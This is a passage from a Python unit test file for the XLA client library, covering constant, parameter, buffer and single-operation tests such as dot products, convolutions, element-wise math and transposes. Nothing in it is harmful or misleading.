@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
def testFingerprint(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
fingerprint = executable.fingerprint
if self.backend.platform == "tpu" and not cloud_tpu:
logging.info("fingerprint: %s", fingerprint)
self.assertNotEmpty(fingerprint)
else:
self.assertIsNone(fingerprint)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
])
self._ExecuteAndCompareClose(c, expected=[0.75])
tests.append(ComputationsWithConstantsTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testXlaShapeIndex(self):
a = xla_client.ShapeIndex((1, 2))
b = xla_client.ShapeIndex((1, 2))
c = xla_client.ShapeIndex((2, 3))
self.assertEqual(a, b)
self.assertNotEqual(b, c)
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testBlockHostUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_host_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
raise unittest.SkipTest(
"The objectof type {} do not extend DeviceArrayBase".format(
type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
buffer.delete()
with self.assertRaises(RuntimeError):
buffer.block_until_ready()
def testOnDeviceSizeInBytes(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
# OnDeviceSizeInBytes varies depending on the platform. Confirm there's
# a reasonable value.
self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)
def testLiveBuffers(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support LiveBuffers().")
self.assertEmpty(self.backend.live_buffers())
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertLen(self.backend.live_buffers(), 3)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
arg1_buffer.delete()
self.assertLen(self.backend.live_buffers(), 2)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
arg0_buffer.delete()
arg2_buffer.delete()
self.assertEmpty(self.backend.live_buffers())
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
def testUnsafeBufferPointer(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)
@unittest.skipIf(cloud_tpu, "not implemented")
def testClone(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
z = y.clone()
self.assertNotEqual(id(x), id(y))
np.testing.assert_array_equal(y.to_py(), z.to_py())
self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())
@unittest.skipIf(cloud_tpu, "not implemented")
def testJaxAttributesHaveCorrectDefaults(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
self.assertIsNone(y.aval)
self.assertIsNone(y._device)
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
